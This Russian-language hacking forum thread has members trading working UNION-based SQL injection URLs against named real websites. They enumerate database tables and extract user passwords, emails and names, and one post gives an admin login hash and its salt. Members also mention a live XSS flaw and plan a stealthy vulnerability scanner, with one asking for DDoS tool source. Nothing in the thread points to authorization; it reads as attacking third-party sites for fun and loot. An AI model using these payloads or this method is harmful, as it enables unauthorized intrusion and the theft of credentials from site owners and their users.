Sql инъекция
|
Neo
|
Дата: Пятница, 26.10.2012, 05:36 | Сообщение # 1
|
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
|
Вот случайно нашёл сайт с уязвимостью sql inj.Вот прочитал тазвание таблицы с юзерами,а вот строки таблице почему-то не выводятся.Может кто знает как их прочитать.
Code
http://www.uniscan.by/articles.php?id=9999+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=0x616d635f7573657273--
Вот так должны прочитаться user_password из amc_users.
Code
http://www.uniscan.by/articles.php?id=9999+union+select+1,user_password,3,4,5++from+amc_users
Но почему-то вылазит ошибка Error in getting 1 article! 
Сообщение отредактировал Neo - Пятница, 26.10.2012, 05:40
|
|
|
|
|
antbert
|
Дата: Пятница, 26.10.2012, 07:57 | Сообщение # 2
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Скорее всего стоят какие-то фильтры. |
|
|
|
|
antbert
|
Дата: Пятница, 26.10.2012, 08:00 | Сообщение # 3
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
http://www.uniscan.by/news.php?id= тут blind sql
можешь попробовать ее крутануть |
|
|
|
|
xXxSh@dowxXx
|
Дата: Пятница, 26.10.2012, 10:06 | Сообщение # 4
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
|
посканив чуть чуть данный сайт, удалось выципить только 2 уязвимости, вот тут например у них XSS:
а раскручиваемая SQL у них вот тут:
правильно antbert сказал...
и вот вам в дополнение один из админов которого смог найти:
PS: Ха, забавно простой скрипт в споилере работает и на нашем сайте ппц ребят исправьте пожалуйста а то активная уязвимость получается.... 
скрипт в споилере с XSS подпортил так как получается бяка..., но я думаю не сложно догадаться что там исправить...
Сообщение отредактировал xXxSh@dowxXx - Пятница, 26.10.2012, 10:19
|
|
|
|
|
Neo
|
Дата: Пятница, 26.10.2012, 12:07 | Сообщение # 5
|
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
|
Да,xss - ка то тут активная!!!А кстати где на том сайте админка?
Сообщение отредактировал Neo - Пятница, 26.10.2012, 12:30
|
|
|
|
|
antbert
|
Дата: Пятница, 26.10.2012, 14:25 | Сообщение # 6
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Улыбает - http://www.uniscan.by/test.php
Админку не нашел я, видимо засунули куда-то, либо вообще плодят всю информацию в ручную, юзая б.д, что дико.
Учитывая .by хочу спросить - случайно не из Белоруссии ? |
|
|
|
|
xXxSh@dowxXx
|
Дата: Пятница, 26.10.2012, 15:25 | Сообщение # 7
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
|
Quote (antbert)
Улыбает - http://www.uniscan.by/test.php
да действительно забавно)))
Quote (antbert)
Админку не нашел
такая же ситуация...
|
|
|
|
|
C@T
|
Дата: Воскресенье, 28.10.2012, 02:56 | Сообщение # 8
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
Quote (xXxSh@dowxXx)
а раскручиваемая SQL у них вот тут:
они обе раскручиваются просто имя бд указывать нужно, ибо первый запрос идет к базе данных "new"
http://www.uniscan.by/article...._users#
Quote (xXxSh@dowxXx)
login,password=admin^240894816f4597f69cbb4bfd29b071cf
забыл указать что там еще и salt есть = 6c0
|
|
|
|
|
Neo
|
Дата: Воскресенье, 28.10.2012, 10:46 | Сообщение # 9
|
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
|
Quote (C@T)
просто имя бд указывать нужно,
А можно по-подробнее.Вроде же имя и так указываем.И что-такое uniscanby? :) 
Почему [url=http://www.uniscan.by/articles.phpid=9999+union+select+1,user_password,3,4,5+from+uniscanby.amc_users#]здесь[/url] надо писать uniscanby. ,а
[url=http://www.uniscan.by/articles.php?id=9999+union+select+1,salt,3,4,password+from+admin#]здесь [/url]
и так всё нормально?
Сообщение отредактировал Neo - Воскресенье, 28.10.2012, 10:52
|
|
|
|
|
C@T
|
Дата: Воскресенье, 28.10.2012, 12:44 | Сообщение # 10
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
ибо первый запросс идет в бд с именем new , если написать , поэтому для бд "new" указывать бд не нужно, uniscanby это база данных
посмотреть в какой базе данных какая таблица можно тут http://www.uniscan.by/news.ph....tables# |
|
|
|
|
Neo
|
Дата: Четверг, 03.01.2013, 06:44 | Сообщение # 11
|
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
|
Вот вчера нашёл ещё одну скулю 
Но опять не получается разрулить её.
Код
http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,table_name,3,4+from+information_Schema.Tables--
Думаю,что читать нужно таблицу site_users.Вот как читаю:
Код
http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,column_name,3,4+from+information_Schema.columns+where+table_name=0x736974655f7573657273--
Отображается user_Name,user_Mail,user_Password
Пробую это прочитать так:
Код
http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,user_Password,database(),4+from+magazine_forum.site_users--
Но,увы выводится вот что:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/magazine/data/www/forum.magazine-rest.in.ua/data/stil.php on line 80
Как же всё-таки прочитать лакомый колонки?
|
|
|
|
|
C@T
|
Дата: Пятница, 04.01.2013, 16:49 | Сообщение # 12
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
Код
http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,TABLE_SCHEMA,3,4+from+information_Schema.tables+where+table_name=0x736974655f7573657273--
2 раза на теже грабли, ошибка в имени базы данных 
Код
http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,user_Password,database(),4+from+magazine_restinua.site_users--
Код
http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,user_Password,user_Mail,user_Name+from+magazine_restinua.site_users--
P.S
функция database() возвращает имя текущей бд, а точнее имя бд в которой находится текущая таблица(та таблица к которой относится первый SELECT)
|
|
|
|
|
Neo
|
Дата: Суббота, 05.01.2013, 10:14 | Сообщение # 13
|
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
|
Спасиба C@T, .Вот ещё нашёл что,там вообще странно
http://www.kez-himmash.ru/content.php?id=-9+union+select+1,2# |
|
|
|
|
Neo
|
Дата: Суббота, 05.01.2013, 10:29 | Сообщение # 14
|
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
|
Вот ещё нашёл,но там ограмная куча таблиц,где трудно найти админку или что-то нужное)))
http://www.ruspolygraf.ru/index.p....ables--
P.S давайте сюда выкладывать найденные скули или xss . |
|
|
|
|
xXxSh@dowxXx
|
Дата: Суббота, 05.01.2013, 16:29 | Сообщение # 15
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
|
Цитата (Neo)
P.S давайте сюда выкладывать найденные скули или xss
Хотел бы уточнить, если Вы находите что то на популярном ресурсе, просьба не выкладывать сюда полную информацию по найденной уязвимости, в дальнейшем можно было бы создать тему в закрытом разделе для таких находок, а впрочем пускай наша администрация решит как лучше поступить в такой ситуации?!
Сообщение отредактировал xXxSh@dowxXx - Суббота, 05.01.2013, 16:32
|
|
|
|
|
C@T
|
Дата: Понедельник, 07.01.2013, 22:45 | Сообщение # 16
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
Цитата (Neo)
http://www.kez-himmash.ru/content.php?id=-9+union+select+1,2#
тут сразу не видно 

|
|
|
|
|
C@T
|
Дата: Понедельник, 07.01.2013, 22:48 | Сообщение # 17
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
а давайте напишем свой сканер уязвимостей на сайтах ? 
P.S язык программирования можно и делфи, тут главное алгоритм работы 
P.P.S если идея нравится то можно создать новую тему и выкладывать туда идеи, наработки 
|
|
|
|
|
xXxSh@dowxXx
|
Дата: Вторник, 08.01.2013, 14:28 | Сообщение # 18
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
|
Цитата (C@T)
а давайте напишем свой сканер уязвимостей на сайтах
большой проект, много работы, куча алгоритмов, если уж и браться за это, то нужно не мало умов специализирующихся по поиску.
Сообщение отредактировал xXxSh@dowxXx - Вторник, 08.01.2013, 14:29
|
|
|
|
|
C@T
|
Дата: Вторник, 08.01.2013, 17:51 | Сообщение # 19
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
Цитата (xXxSh@dowxXx)
большой проект, много работы, куча алгоритмов, если уж и браться за это, то нужно не мало умов специализирующихся по поиску.
потихоньку скриптики писать, почему бы и нет, главное начать 
|
|
|
|
|
antbert
|
Дата: Вторник, 08.01.2013, 18:35 | Сообщение # 20
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Свой писать смысла не имеет, это тонны кода, существуют хорошие, платные реверснутые аналоги, просто с огромнейшим функционалом.
Разумеется я не беру в расчет самообразование.
Сообщение отредактировал antbert - Вторник, 08.01.2013, 18:36
|
|
|
|
|
xXxSh@dowxXx
|
Дата: Вторник, 08.01.2013, 18:56 | Сообщение # 21
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
|
Цитата (antbert)
Разумеется я не беру в расчет самообразование
Вот вот, а мы исключительно в целях самообразования!
|
|
|
|
|
Don_Diego
|
Дата: Вторник, 08.01.2013, 21:47 | Сообщение # 22
|
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 253
Статус: Offline
|
Цитата (C@T)
а давайте напишем свой сканер уязвимостей на сайтах ?
Цитата (xXxSh@dowxXx)
большой проект, много работы, куча алгоритмов, если уж и браться за это, то нужно не мало умов специализирующихся по поиску.
Потихоньку можно. Можно даже внести свою изюминку - воспользоваться GLScene и создать полноценный 3D интерфейс для такой проги, будет как в фильмах про хакеров Такого точно еще нигде не встречал.
Цитата (antbert)
существуют хорошие, платные реверснутые аналоги
А тут можно создать бесплатный, дескать для рекламы ресурса. Самообразование тоже не помешает.
|
|
|
|
|
C@T
|
Дата: Среда, 09.01.2013, 00:58 | Сообщение # 23
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
Цитата (antbert)
Свой писать смысла не имеет, это тонны кода, существуют хорошие, платные реверснутые аналоги, просто с огромнейшим функционалом.
Разумеется я не беру в расчет самообразование.
в том то и дело что у них слишком огромный функционал, у меня например никогда не хватало терпения дождатся полного скана акунетиксом 
ну а так полезно может быть иметь подобный сканер, можно сделать расширенную настройку, или даже модульную систему, для добавления новых уязвимостей
P.S на вопрос так и не ответили, будем делать или нет ? (я за). ну и если будем то на каком языке, я голосую за php, ибо крос платформенно и подобное писать удобней на пхп, ну и для тех кто его не знает не составит труда его выучить 
|
|
|
|
|
antbert
|
Дата: Среда, 09.01.2013, 01:03 | Сообщение # 24
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Ок, в этом случае за основу предлагаю взять сорцы хорошего php one-ip ддосера, может у кого есть в запасниках, я свои чистил?
На вопрос: "Зачем?" постараюсь сразу ответить. Проблема того же акунетикса в том, что его скан можно засечь и блокировать, нужна очень хорошая рандомизация.
ps: Кто-нибудь разбирается в печенько-уязвимостях? Не видел еще нормальной реализации нигде.
Сообщение отредактировал antbert - Среда, 09.01.2013, 01:03
|
|
|
|
|
xXxSh@dowxXx
|
Дата: Среда, 09.01.2013, 02:36 | Сообщение # 25
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
|
я всегда за нормальный проект и хорошую идею 
а на счет того что можно присечь скан то это логично, ведь там куча запросов в многопоточном режиме и с одного ip это прекрасно видно. |
|
|
|
|